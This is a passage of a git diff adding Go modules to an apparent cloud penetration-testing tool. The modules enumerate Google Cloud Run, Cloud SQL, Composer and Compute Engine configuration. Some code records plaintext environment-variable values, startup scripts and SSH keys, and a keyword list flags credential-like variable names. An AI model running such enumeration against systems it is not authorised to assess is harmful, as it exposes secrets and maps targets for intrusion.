Manager reference used by the service +type SecretRefInfo struct { + EnvVarName string // The env var name that references this secret + SecretName string // Secret Manager secret name + SecretVersion string // Version (e.g., "latest", "1") + MountPath string // For volume mounts, the path where it's mounted + Type string // "env" or "volume" +} + +// JobInfo holds Cloud Run job details +type JobInfo struct { + Name string + ProjectID string + Region string + ServiceAccount string + ContainerImage string + LastExecution string + Creator string + UpdateTime string + + // Configuration + TaskCount int64 + Parallelism int64 + MaxRetries int64 
+ Timeout string + + // Environment + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret + UsesDefaultSA bool + + // Detailed env var and secret info + EnvVars []EnvVarInfo + SecretRefs []SecretRefInfo +} + +// Services retrieves all Cloud Run services in a project across all regions +func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { + ctx := context.Background() + + service, err := run.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var services []ServiceInfo + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Services.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { + for _, svc := range page.Services { + info := parseServiceInfo(svc, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := cs.getServiceIAMPolicy(service, svc.Name) + if iamErr == nil && iamPolicy != nil { + info.InvokerMembers, info.IsPublic = parseInvokerBindings(iamPolicy) + } + + services = append(services, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + return services, nil +} + +// Jobs retrieves all Cloud Run jobs in a project across all regions +func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := run.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var jobs []JobInfo + + // List jobs across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Jobs.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + jobs = 
append(jobs, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + return jobs, nil +} + +// parseServiceInfo extracts relevant information from a Cloud Run service +func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) ServiceInfo { + info := ServiceInfo{ + Name: extractName(svc.Name), + ProjectID: projectID, + Description: svc.Description, + Creator: svc.Creator, + UpdateTime: svc.UpdateTime, + URL: svc.Uri, + } + + // Extract region from service name + // Format: projects/{project}/locations/{location}/services/{name} + parts := strings.Split(svc.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Ingress settings + info.IngressSettings = svc.Ingress + + // Latest revision info + info.LatestRevision = svc.LatestCreatedRevision + info.LatestReadyRevision = svc.LatestReadyRevision + + // Check if all traffic goes to latest + for _, traffic := range svc.Traffic { + if traffic.Type == "TRAFFIC_TARGET_ALLOCATION_TYPE_LATEST" && traffic.Percent == 100 { + info.TrafficAllOnLatest = true + break + } + } + + // Binary authorization + if svc.BinaryAuthorization != nil { + info.BinaryAuthorizationPolicy = svc.BinaryAuthorization.Policy + if svc.BinaryAuthorization.UseDefault { + info.BinaryAuthorizationPolicy = "default" + } + } + + // Template configuration (current revision settings) + if svc.Template != nil { + info.ServiceAccount = svc.Template.ServiceAccount + info.Timeout = svc.Template.Timeout + + if svc.Template.Scaling != nil { + info.MaxInstances = svc.Template.Scaling.MaxInstanceCount + info.MinInstances = svc.Template.Scaling.MinInstanceCount + } + + // VPC access configuration + if svc.Template.VpcAccess != nil { + info.VPCAccess = svc.Template.VpcAccess.Connector + info.VPCEgressSettings = svc.Template.VpcAccess.Egress + if info.VPCAccess == "" && svc.Template.VpcAccess.NetworkInterfaces != nil { + info.VPCAccess = "Direct VPC" + } + } + + // Container 
configuration + if len(svc.Template.Containers) > 0 { + container := svc.Template.Containers[0] + info.ContainerImage = container.Image + + // Port + if len(container.Ports) > 0 { + info.ContainerPort = container.Ports[0].ContainerPort + } + + // Resources + if container.Resources != nil { + if container.Resources.Limits != nil { + if cpu, ok := container.Resources.Limits["cpu"]; ok { + info.CPULimit = cpu + } + if mem, ok := container.Resources.Limits["memory"]; ok { + info.MemoryLimit = mem + } + } + } + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + // Check if this volume is a secret + for _, svcVol := range svc.Template.Volumes { + if svcVol.Name == vol.Name && svcVol.Secret != nil { + info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: svcVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = 
isDefaultServiceAccount(info.ServiceAccount, projectID) + } + + return info +} + +// parseJobInfo extracts relevant information from a Cloud Run job +func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Creator: job.Creator, + UpdateTime: job.UpdateTime, + } + + // Extract region from job name + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Last execution + if job.LatestCreatedExecution != nil { + info.LastExecution = job.LatestCreatedExecution.Name + } + + // Template configuration + if job.Template != nil { + info.TaskCount = job.Template.TaskCount + info.Parallelism = job.Template.Parallelism + + if job.Template.Template != nil { + info.MaxRetries = job.Template.Template.MaxRetries + info.Timeout = job.Template.Template.Timeout + info.ServiceAccount = job.Template.Template.ServiceAccount + + // Container configuration + if len(job.Template.Template.Containers) > 0 { + container := job.Template.Template.Containers[0] + info.ContainerImage = container.Image + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count 
secret volumes + for _, vol := range container.VolumeMounts { + for _, jobVol := range job.Template.Template.Volumes { + if jobVol.Name == vol.Name && jobVol.Secret != nil { + info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: jobVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) + } + } + + return info +} + +// getServiceIAMPolicy retrieves the IAM policy for a Cloud Run service +func (cs *CloudRunService) getServiceIAMPolicy(service *run.Service, serviceName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Services.GetIamPolicy(serviceName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseInvokerBindings extracts who can invoke the service and checks for public access +func parseInvokerBindings(policy *run.GoogleIamV1Policy) ([]string, bool) { + var invokers []string + isPublic := false + + for _, binding := range policy.Bindings { + // Check for invoker role + if binding.Role == "roles/run.invoker" { + invokers = append(invokers, binding.Members...) 
+ + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + isPublic = true + } + } + } + } + + return invokers, isPublic +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// secretPatterns maps env var name patterns to secret types +var secretPatterns = map[string]string{ + "PASSWORD": "password", + "PASSWD": "password", + "SECRET": "secret", + "API_KEY": "api-key", + "APIKEY": "api-key", + "API-KEY": "api-key", + "TOKEN": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER": "token", + "CREDENTIAL": "credential", + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "CONNECTION_STRING": "connection-string", + "CONN_STR": "connection-string", + "DATABASE_URL": "connection-string", + "DB_PASSWORD": "password", + "DB_PASS": "password", + "MYSQL_PASSWORD": "password", + "POSTGRES_PASSWORD": "password", + "REDIS_PASSWORD": "password", + "MONGODB_URI": "connection-string", + "AWS_ACCESS_KEY": "credential", + "AWS_SECRET": "credential", + "AZURE_KEY": "credential", + "GCP_KEY": "credential", + "ENCRYPTION_KEY": "credential", + "SIGNING_KEY": "credential", + "JWT_SECRET": "credential", + "SESSION_SECRET": "credential", + "OAUTH": "credential", + "CLIENT_SECRET": "credential", +} + +// detectHardcodedSecrets analyzes env vars to find potential hardcoded secrets +func detectHardcodedSecrets(envVars []*run.GoogleCloudRunV2EnvVar) []HardcodedSecret { + var secrets []HardcodedSecret + + for _, env := range envVars { + if env == nil { + continue + } + + // Skip if using Secret Manager reference + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + continue + } + + // Only flag if there's a direct value (not empty) + if env.Value == "" { + continue + } + + 
envNameUpper := strings.ToUpper(env.Name) + + for pattern, secretType := range secretPatterns { + if strings.Contains(envNameUpper, pattern) { + secrets = append(secrets, HardcodedSecret{ + EnvVarName: env.Name, + SecretType: secretType, + }) + break + } + } + } + + return secrets +} + +// isDefaultServiceAccount checks if the service account is a default compute SA +func isDefaultServiceAccount(sa, projectID string) bool { + if sa == "" { + return true // Empty means using default + } + // Default compute SA pattern: {project-number}-compute@developer.gserviceaccount.com + return strings.Contains(sa, "-compute@developer.gserviceaccount.com") +} diff --git a/gcp/services/cloudsqlService/cloudsqlService.go b/gcp/services/cloudsqlService/cloudsqlService.go new file mode 100644 index 00000000..ea6b6cdc --- /dev/null +++ b/gcp/services/cloudsqlService/cloudsqlService.go @@ -0,0 +1,268 @@ +package cloudsqlservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + sqladmin "google.golang.org/api/sqladmin/v1" +) + +type CloudSQLService struct{} + +func New() *CloudSQLService { + return &CloudSQLService{} +} + +// SQLInstanceInfo holds Cloud SQL instance details with security-relevant information +type SQLInstanceInfo struct { + // Basic info + Name string + ProjectID string + Region string + DatabaseVersion string + Tier string + State string + + // Network configuration + PublicIP string + PrivateIP string + HasPublicIP bool + AuthorizedNetworks []AuthorizedNetwork + RequireSSL bool + SSLMode string + + // Security configuration + ServiceAccountEmail string + RootPasswordSet bool + PasswordPolicyEnabled bool + IAMAuthentication bool + + // Backup configuration + BackupEnabled bool + BinaryLogEnabled bool + BackupLocation string + PointInTimeRecovery bool + RetentionDays int + + // Encryption + KMSKeyName string + EncryptionType string // Google-managed or CMEK + + // High Availability + AvailabilityType string // 
REGIONAL or ZONAL + FailoverReplica string + + // Maintenance + MaintenanceWindow string + + // Databases (if enumerated) + Databases []string + + // Security issues detected + SecurityIssues []string +} + +// AuthorizedNetwork represents a network authorized to connect +type AuthorizedNetwork struct { + Name string + Value string // CIDR + IsPublic bool // 0.0.0.0/0 or similar +} + +// Instances retrieves all Cloud SQL instances in a project +func (cs *CloudSQLService) Instances(projectID string) ([]SQLInstanceInfo, error) { + ctx := context.Background() + + service, err := sqladmin.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + var instances []SQLInstanceInfo + for _, instance := range resp.Items { + info := parseInstanceInfo(instance, projectID) + instances = append(instances, info) + } + + return instances, nil +} + +// parseInstanceInfo extracts security-relevant information from a Cloud SQL instance +func parseInstanceInfo(instance *sqladmin.DatabaseInstance, projectID string) SQLInstanceInfo { + info := SQLInstanceInfo{ + Name: instance.Name, + ProjectID: projectID, + DatabaseVersion: instance.DatabaseVersion, + State: instance.State, + SecurityIssues: []string{}, + } + + // Region from GCE zone + if instance.GceZone != "" { + // Zone format: us-central1-a -> extract region us-central1 + parts := strings.Split(instance.GceZone, "-") + if len(parts) >= 2 { + info.Region = parts[0] + "-" + parts[1] + } + } else if instance.Region != "" { + info.Region = instance.Region + } + + // Settings + if instance.Settings != nil { + info.Tier = instance.Settings.Tier + info.AvailabilityType = instance.Settings.AvailabilityType + + // IP configuration + if instance.Settings.IpConfiguration != nil { + ipConfig := instance.Settings.IpConfiguration + 
info.RequireSSL = ipConfig.RequireSsl
+			info.SSLMode = ipConfig.SslMode
+			for _, flag := range instance.Settings.DatabaseFlags { if flag.Name == "cloudsql.iam_authentication" && flag.Value == "on" { info.IAMAuthentication = true } } // IAM DB auth is a database flag, not an IpConfiguration field
+
+			// Check for private IP
+			if ipConfig.PrivateNetwork != "" {
+				info.HasPublicIP = ipConfig.Ipv4Enabled
+			} else {
+				info.HasPublicIP = ipConfig.Ipv4Enabled // no private network: reflect the actual public-IPv4 setting
+			}
+
+			// Parse authorized networks
+			for _, network := range ipConfig.AuthorizedNetworks {
+				an := AuthorizedNetwork{
+					Name:  network.Name,
+					Value: network.Value,
+				}
+				// Check if network is public (0.0.0.0/0 or similar broad ranges)
+				if network.Value == "0.0.0.0/0" ||
+					network.Value == "0.0.0.0/1" ||
+					network.Value == "128.0.0.0/1" {
+					an.IsPublic = true
+				}
+				info.AuthorizedNetworks = append(info.AuthorizedNetworks, an)
+			}
+		}
+
+		// Backup configuration
+		if instance.Settings.BackupConfiguration != nil {
+			backup := instance.Settings.BackupConfiguration
+			info.BackupEnabled = backup.Enabled
+			info.BinaryLogEnabled = backup.BinaryLogEnabled
+			info.BackupLocation = backup.Location
+			info.PointInTimeRecovery = backup.PointInTimeRecoveryEnabled
+			info.RetentionDays = int(backup.TransactionLogRetentionDays)
+		}
+
+		// Password policy
+		if instance.Settings.PasswordValidationPolicy != nil {
+			info.PasswordPolicyEnabled = instance.Settings.PasswordValidationPolicy.EnablePasswordPolicy
+		}
+
+		// Maintenance window
+		if instance.Settings.MaintenanceWindow != nil {
+			info.MaintenanceWindow = fmt.Sprintf("Day %d, Hour %d",
+				instance.Settings.MaintenanceWindow.Day,
+				instance.Settings.MaintenanceWindow.Hour)
+		}
+
+		// Database flags (can reveal security settings)
+		// These could be parsed for specific security-relevant flags
+	}
+
+	// IP addresses
+	for _, ip := range instance.IpAddresses {
+		switch ip.Type {
+		case "PRIMARY":
+			info.PublicIP = ip.IpAddress
+		case "PRIVATE":
+			info.PrivateIP = ip.IpAddress
+		}
+	}
+
+	// Service account
+	info.ServiceAccountEmail = instance.ServiceAccountEmailAddress
+
+	// Disk encryption
+	if 
instance.DiskEncryptionConfiguration != nil { + info.KMSKeyName = instance.DiskEncryptionConfiguration.KmsKeyName + if info.KMSKeyName != "" { + info.EncryptionType = "CMEK" + } else { + info.EncryptionType = "Google-managed" + } + } else { + info.EncryptionType = "Google-managed" + } + + // Failover replica + if instance.FailoverReplica != nil { + info.FailoverReplica = instance.FailoverReplica.Name + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(instance SQLInstanceInfo) []string { + var issues []string + + // Public IP enabled + if instance.HasPublicIP { + issues = append(issues, "Public IP enabled") + } + + // Public IP without SSL requirement + if instance.HasPublicIP && !instance.RequireSSL { + issues = append(issues, "Public IP without SSL requirement") + } + + // Authorized networks include 0.0.0.0/0 + for _, network := range instance.AuthorizedNetworks { + if network.IsPublic { + issues = append(issues, fmt.Sprintf("Authorized network allows all IPs: %s", network.Value)) + } + } + + // No authorized networks but public IP (potentially open to all) + if instance.HasPublicIP && len(instance.AuthorizedNetworks) == 0 { + issues = append(issues, "Public IP with no authorized networks (blocked by default, but verify)") + } + + // Backups not enabled + if !instance.BackupEnabled { + issues = append(issues, "Automated backups not enabled") + } + + // Point-in-time recovery not enabled + if !instance.PointInTimeRecovery && instance.BackupEnabled { + issues = append(issues, "Point-in-time recovery not enabled") + } + + // Using Google-managed encryption (not CMEK) + if instance.EncryptionType == "Google-managed" { + // This is informational, not necessarily an issue + // issues = append(issues, "Using Google-managed encryption (not CMEK)") + } + + // Single zone deployment + if instance.AvailabilityType == 
"ZONAL" { + issues = append(issues, "Single zone deployment (no HA)") + } + + // Password policy not enabled + if !instance.PasswordPolicyEnabled { + issues = append(issues, "Password validation policy not enabled") + } + + return issues +} diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go new file mode 100644 index 00000000..c9ad22f3 --- /dev/null +++ b/gcp/services/composerService/composerService.go @@ -0,0 +1,160 @@ +package composerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + composer "google.golang.org/api/composer/v1" +) + +type ComposerService struct { + session *gcpinternal.SafeSession +} + +func New() *ComposerService { + return &ComposerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *ComposerService { + return &ComposerService{session: session} +} + +// EnvironmentInfo represents a Cloud Composer environment +type EnvironmentInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Airflow config + AirflowURI string `json:"airflowUri"` + DagGcsPrefix string `json:"dagGcsPrefix"` + AirflowVersion string `json:"airflowVersion"` + PythonVersion string `json:"pythonVersion"` + ImageVersion string `json:"imageVersion"` + + // Node config + MachineType string `json:"machineType"` + DiskSizeGb int64 `json:"diskSizeGb"` + NodeCount int64 `json:"nodeCount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + ServiceAccount string `json:"serviceAccount"` + + // Security config + PrivateEnvironment bool `json:"privateEnvironment"` + WebServerAllowedIPs []string `json:"webServerAllowedIps"` + EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` +} + +// ListEnvironments retrieves all Composer environments in a 
project
+func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, error) {
+	ctx := context.Background()
+	var service *composer.Service
+	var err error
+
+	if s.session != nil {
+		service, err = composer.NewService(ctx, s.session.GetClientOption())
+	} else {
+		service, err = composer.NewService(ctx)
+	}
+	if err != nil {
+		return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com")
+	}
+
+	var environments []EnvironmentInfo
+
+	// List environments across all locations
+	parent := fmt.Sprintf("projects/%s/locations/-", projectID)
+	req := service.Projects.Locations.Environments.List(parent)
+	err = req.Pages(ctx, func(page *composer.ListEnvironmentsResponse) error {
+		for _, env := range page.Environments {
+			info := s.parseEnvironment(env, projectID)
+			environments = append(environments, info)
+		}
+		return nil
+	})
+	if err != nil {
+		return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com")
+	}
+
+	return environments, nil
+}
+
+// parseEnvironment converts a Composer environment to EnvironmentInfo
+func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID string) EnvironmentInfo {
+	info := EnvironmentInfo{
+		Name:       extractName(env.Name),
+		ProjectID:  projectID,
+		Location:   extractLocation(env.Name),
+		State:      env.State,
+		CreateTime: env.CreateTime,
+		UpdateTime: env.UpdateTime,
+	}
+
+	if env.Config != nil {
+		// Airflow config
+		if env.Config.AirflowUri != "" {
+			info.AirflowURI = env.Config.AirflowUri
+		}
+		info.DagGcsPrefix = env.Config.DagGcsPrefix
+
+		// Software config
+		if env.Config.SoftwareConfig != nil {
+			if parts := strings.SplitN(env.Config.SoftwareConfig.ImageVersion, "-airflow-", 2); len(parts) == 2 { info.AirflowVersion = parts[1] } // version is encoded in ImageVersion ("composer-X.Y.Z-airflow-A.B.C")
+			info.PythonVersion = env.Config.SoftwareConfig.PythonVersion
+			info.ImageVersion = env.Config.SoftwareConfig.ImageVersion
+		}
+
+		// Node config
+		if env.Config.NodeConfig != nil {
+			info.MachineType = env.Config.NodeConfig.MachineType
+			info.DiskSizeGb = 
env.Config.NodeConfig.DiskSizeGb + info.Network = env.Config.NodeConfig.Network + info.Subnetwork = env.Config.NodeConfig.Subnetwork + info.ServiceAccount = env.Config.NodeConfig.ServiceAccount + } + + info.NodeCount = env.Config.NodeCount + + // Private environment config + if env.Config.PrivateEnvironmentConfig != nil { + info.PrivateEnvironment = env.Config.PrivateEnvironmentConfig.EnablePrivateEnvironment + // EnablePrivateEndpoint is part of PrivateClusterConfig, not PrivateEnvironmentConfig + if env.Config.PrivateEnvironmentConfig.PrivateClusterConfig != nil { + info.EnablePrivateEndpoint = env.Config.PrivateEnvironmentConfig.PrivateClusterConfig.EnablePrivateEndpoint + } + } + + // Web server network access control + if env.Config.WebServerNetworkAccessControl != nil { + for _, cidr := range env.Config.WebServerNetworkAccessControl.AllowedIpRanges { + info.WebServerAllowedIPs = append(info.WebServerAllowedIPs, cidr.Value) + } + } + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index bcff7739..efa3fada 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -5,41 +5,163 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/compute/v1" ) type ComputeEngineService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new ComputeEngineService (legacy - uses ADC directly) func New() 
*ComputeEngineService { return &ComputeEngineService{} } +// NewWithSession creates a ComputeEngineService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *ComputeEngineService { + return &ComputeEngineService{session: session} +} + +// ServiceAccountInfo contains service account details for an instance +type ServiceAccountInfo struct { + Email string `json:"email"` + Scopes []string `json:"scopes"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ComputeEngineInfo contains instance metadata and security-relevant configuration type ComputeEngineInfo struct { - Name string - ID string - Zone string - State string - ExternalIP string - InternalIP string - ServiceAccounts []*compute.ServiceAccount // Assuming role is derived from service accounts - NetworkInterfaces []*compute.NetworkInterface - Tags *compute.Tags - ProjectID string + // Basic info + Name string `json:"name"` + ID string `json:"id"` + Zone string `json:"zone"` + State string `json:"state"` + ProjectID string `json:"projectID"` + + // Network configuration + ExternalIP string `json:"externalIP"` + InternalIP string `json:"internalIP"` + NetworkInterfaces []*compute.NetworkInterface `json:"networkInterfaces"` + CanIPForward bool `json:"canIpForward"` // Can forward packets (router/NAT) + + // Service accounts and scopes + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + HasDefaultSA bool `json:"hasDefaultSA"` // Uses default compute SA + HasCloudScopes bool `json:"hasCloudScopes"` // Has cloud-platform or other broad scopes + + // Security configuration + DeletionProtection bool `json:"deletionProtection"` // Protected against deletion + ShieldedVM bool `json:"shieldedVM"` // Shielded VM enabled + SecureBoot bool `json:"secureBoot"` // Secure Boot enabled + VTPMEnabled bool `json:"vtpmEnabled"` // vTPM enabled + IntegrityMonitoring 
bool `json:"integrityMonitoring"` // Integrity monitoring enabled + ConfidentialVM bool `json:"confidentialVM"` // Confidential computing enabled + + // Instance metadata + MachineType string `json:"machineType"` + Tags *compute.Tags `json:"tags"` + Labels map[string]string `json:"labels"` + + // Metadata security + HasStartupScript bool `json:"hasStartupScript"` // Has startup script in metadata + HasSSHKeys bool `json:"hasSSHKeys"` // Has SSH keys in metadata + BlockProjectSSHKeys bool `json:"blockProjectSSHKeys"` // Blocks project-wide SSH keys + OSLoginEnabled bool `json:"osLoginEnabled"` // OS Login enabled + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` // OS Login 2FA enabled + SerialPortEnabled bool `json:"serialPortEnabled"` // Serial port access enabled + + // Pentest-specific fields: actual content extraction + StartupScriptContent string `json:"startupScriptContent"` // Actual startup script content + StartupScriptURL string `json:"startupScriptURL"` // URL to startup script if remote + SSHKeys []string `json:"sshKeys"` // Extracted SSH keys + CustomMetadata []string `json:"customMetadata"` // Other custom metadata keys + + // Disk encryption + BootDiskEncryption string `json:"bootDiskEncryption"` // "Google-managed", "CMEK", or "CSEK" + BootDiskKMSKey string `json:"bootDiskKMSKey"` // KMS key for CMEK + + // Timestamps + CreationTimestamp string `json:"creationTimestamp"` + LastStartTimestamp string `json:"lastStartTimestamp"` + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// ProjectMetadataInfo contains project-level metadata security info +type ProjectMetadataInfo struct { + ProjectID string `json:"projectId"` + HasProjectSSHKeys bool `json:"hasProjectSSHKeys"` + ProjectSSHKeys []string `json:"projectSSHKeys"` + HasProjectStartupScript bool `json:"hasProjectStartupScript"` + ProjectStartupScript string `json:"projectStartupScript"` + OSLoginEnabled bool `json:"osLoginEnabled"` + OSLogin2FAEnabled bool 
`json:"osLogin2FAEnabled"` + SerialPortEnabled bool `json:"serialPortEnabled"` + CustomMetadataKeys []string `json:"customMetadataKeys"` +} + +// InstanceIAMInfo contains IAM policy info for an instance +type InstanceIAMInfo struct { + InstanceName string `json:"instanceName"` + Zone string `json:"zone"` + ProjectID string `json:"projectId"` + ComputeAdmins []string `json:"computeAdmins"` // compute.admin or owner + InstanceAdmins []string `json:"instanceAdmins"` // compute.instanceAdmin + SSHUsers []string `json:"sshUsers"` // compute.osLogin or osAdminLogin + MetadataSetters []string `json:"metadataSetters"` // compute.instances.setMetadata +} + +// getService returns a compute service, using session if available +func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Service, error) { + if ces.session != nil { + return compute.NewService(ctx, ces.session.GetClientOption()) + } + return compute.NewService(ctx) +} + +// getInstanceIAMBindings retrieves all IAM bindings for an instance +func (ces *ComputeEngineService) getInstanceIAMBindings(service *compute.Service, projectID, zone, instanceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.Instances.GetIamPolicy(projectID, zone, instanceName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings } // Retrieves instances from all regions and zones for a project without using concurrency. 
func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + computeService, err := ces.getService(ctx) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } regions, err := computeService.Regions.List(projectID).Do() if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var instanceInfos []ComputeEngineInfo @@ -48,21 +170,66 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf zone := getZoneNameFromURL(zoneURL) instanceList, err := computeService.Instances.List(projectID, zone).Do() if err != nil { - return nil, fmt.Errorf("error retrieving instances from zone %s: %v", zone, err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, instance := range instanceList.Items { info := ComputeEngineInfo{ - Name: instance.Name, - ID: fmt.Sprintf("%v", instance.Id), - Zone: zoneURL, - State: instance.Status, - ExternalIP: getExternalIP(instance), - InternalIP: getInternalIP(instance), - ServiceAccounts: instance.ServiceAccounts, - NetworkInterfaces: instance.NetworkInterfaces, - Tags: instance.Tags, - ProjectID: projectID, + Name: instance.Name, + ID: fmt.Sprintf("%v", instance.Id), + Zone: zone, + State: instance.Status, + ExternalIP: getExternalIP(instance), + InternalIP: getInternalIP(instance), + NetworkInterfaces: instance.NetworkInterfaces, + CanIPForward: instance.CanIpForward, + Tags: instance.Tags, + Labels: instance.Labels, + ProjectID: projectID, + DeletionProtection: instance.DeletionProtection, + CreationTimestamp: instance.CreationTimestamp, + LastStartTimestamp: instance.LastStartTimestamp, + } + + // Parse machine type (extract just the type name) + info.MachineType = getMachineTypeName(instance.MachineType) + + // Parse service accounts and scopes + info.ServiceAccounts, 
